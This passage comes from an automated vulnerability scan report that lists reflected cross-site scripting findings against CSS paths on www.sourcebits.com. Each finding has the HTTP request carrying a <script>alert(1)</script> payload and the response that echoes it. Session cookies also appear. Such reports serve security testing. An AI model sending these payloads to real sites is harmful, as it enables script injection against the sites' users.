Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:12 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/cssd0211<script>alert(1)</script>9ec8785078a/lightbox.css?1292234337</h2>
...[SNIP]...

1.38. http://www.sourcebits.com/css/lightbox.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/lightbox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec140"><script>alert(1)</script>fbb9a01d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssec140"><script>alert(1)</script>fbb9a01d5/lightbox.css?1292234337 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:09 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/cssec140"><script>alert(1)</script>fbb9a01d5/lightbox.css?1292234337" />
...[SNIP]...

1.39. http://www.sourcebits.com/css/lightbox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/lightbox.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 82cd0<script>alert(1)</script>d709265ed6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/lightbox.css82cd0<script>alert(1)</script>d709265ed6a?1292234337 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:25 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/lightbox.css82cd0<script>alert(1)</script>d709265ed6a?1292234337</h2>
...[SNIP]...

1.40. http://www.sourcebits.com/css/lightbox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/lightbox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 287fc"><script>alert(1)</script>cb1a4aac2a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/lightbox.css287fc"><script>alert(1)</script>cb1a4aac2a8?1292234337 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:22 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/lightbox.css287fc"><script>alert(1)</script>cb1a4aac2a8?1292234337" />
...[SNIP]...

1.41. http://www.sourcebits.com/css/main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c087c"><script>alert(1)</script>f6890790475 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssc087c"><script>alert(1)</script>f6890790475/main.css?1292324578 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/cssc087c"><script>alert(1)</script>f6890790475/main.css?1292324578" />
...[SNIP]...

1.42. http://www.sourcebits.com/css/main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5177<script>alert(1)</script>0074e58a298 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssa5177<script>alert(1)</script>0074e58a298/main.css?1292324578 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/cssa5177<script>alert(1)</script>0074e58a298/main.css?1292324578</h2>
...[SNIP]...

1.43. http://www.sourcebits.com/css/main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6daf4<script>alert(1)</script>f290d15328 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/main.css6daf4<script>alert(1)</script>f290d15328?1292324578 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/main.css6daf4<script>alert(1)</script>f290d15328?1292324578</h2>
...[SNIP]...

1.44. http://www.sourcebits.com/css/main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389ac"><script>alert(1)</script>b7a4d04568a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/main.css389ac"><script>alert(1)</script>b7a4d04568a?1292324578 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/main.css389ac"><script>alert(1)</script>b7a4d04568a?1292324578" />
...[SNIP]...

1.45. http://www.sourcebits.com/css/project.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/project.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dfe4d<script>alert(1)</script>e6dd21202cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssdfe4d<script>alert(1)</script>e6dd21202cb/project.css?1293452362 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/cssdfe4d<script>alert(1)</script>e6dd21202cb/project.css?1293452362</h2>
...[SNIP]...

1.46. http://www.sourcebits.com/css/project.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/project.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c316"><script>alert(1)</script>d0be277839e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css6c316"><script>alert(1)</script>d0be277839e/project.css?1293452362 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css6c316"><script>alert(1)</script>d0be277839e/project.css?1293452362" />
...[SNIP]...

1.47. http://www.sourcebits.com/css/project.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/project.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8221e<script>alert(1)</script>87f01210c4f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/project.css8221e<script>alert(1)</script>87f01210c4f?1293452362 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:27 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/project.css8221e<script>alert(1)</script>87f01210c4f?1293452362</h2>
...[SNIP]...

1.48. http://www.sourcebits.com/css/project.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/project.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2426"><script>alert(1)</script>4e9efdf4dbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/project.cssd2426"><script>alert(1)</script>4e9efdf4dbe?1293452362 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:25 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/project.cssd2426"><script>alert(1)</script>4e9efdf4dbe?1293452362" />
...[SNIP]...

1.49. http://www.sourcebits.com/css/sb_announce.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/sb_announce.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload edc54<script>alert(1)</script>ce6c2029740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssedc54<script>alert(1)</script>ce6c2029740/sb_announce.css?1305558372 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:11 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/cssedc54<script>alert(1)</script>ce6c2029740/sb_announce.css?1305558372</h2>
...[SNIP]...

1.50. http://www.sourcebits.com/css/sb_announce.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/sb_announce.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86a59"><script>alert(1)</script>89d15ce5c0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css86a59"><script>alert(1)</script>89d15ce5c0f/sb_announce.css?1305558372 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css86a59"><script>alert(1)</script>89d15ce5c0f/sb_announce.css?1305558372" />
...[SNIP]...

1.51. http://www.sourcebits.com/css/sb_announce.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/sb_announce.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a46b"><script>alert(1)</script>337df9fc360 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/sb_announce.css3a46b"><script>alert(1)</script>337df9fc360?1305558372 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/sb_announce.css3a46b"><script>alert(1)</script>337df9fc360?1305558372" />
...[SNIP]...

1.52. http://www.sourcebits.com/css/sb_announce.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/sb_announce.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23229<script>alert(1)</script>d777599492e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

